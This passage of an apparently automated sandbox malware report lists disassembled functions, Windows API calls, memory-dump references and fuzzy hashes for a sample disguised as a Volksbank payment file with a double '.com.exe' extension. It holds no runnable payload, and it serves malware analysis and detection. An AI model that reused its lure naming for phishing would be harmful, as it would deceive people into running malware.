                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                                                                                                                          Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                                                                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                                                                                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                                                                                                          Function 00405BDB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405BE9
                                                                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00405BEE
                                                                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00405C06
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • fareafvrgende\Djrve27.gud, xrefs: 00405BDC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                                          • String ID: fareafvrgende\Djrve27.gud
                                                                                                                                                                                                                                          • API String ID: 3213498283-3469630132
                                                                                                                                                                                                                                          • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                                                                                                                                                                          • Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA
                                                                                                                                                                                                                                          Function 00405B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00405B36
                                                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00405B40
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405B52
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                                                                                                                          • Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD
                                                                                                                                                                                                                                          Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,?,0000000A), ref: 00402E70
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402E8E
                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402EB9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                                          • Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                                                                                                                                                                                                          • Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC
                                                                                                                                                                                                                                          Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040587A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405857
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                          • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                                                                                                                          • Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78
                                                                                                                                                                                                                                          Function 004038D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76943420,004038B0,004036C6,00000006,?,00000006,?,0000000A), ref: 004038F2
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00A34BF0), ref: 004038F9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                          • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                                                                                                                          • Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8
                                                                                                                                                                                                                                          Function 00405B7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405B82
                                                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405B92
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                                                                                                                          • Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC
                                                                                                                                                                                                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
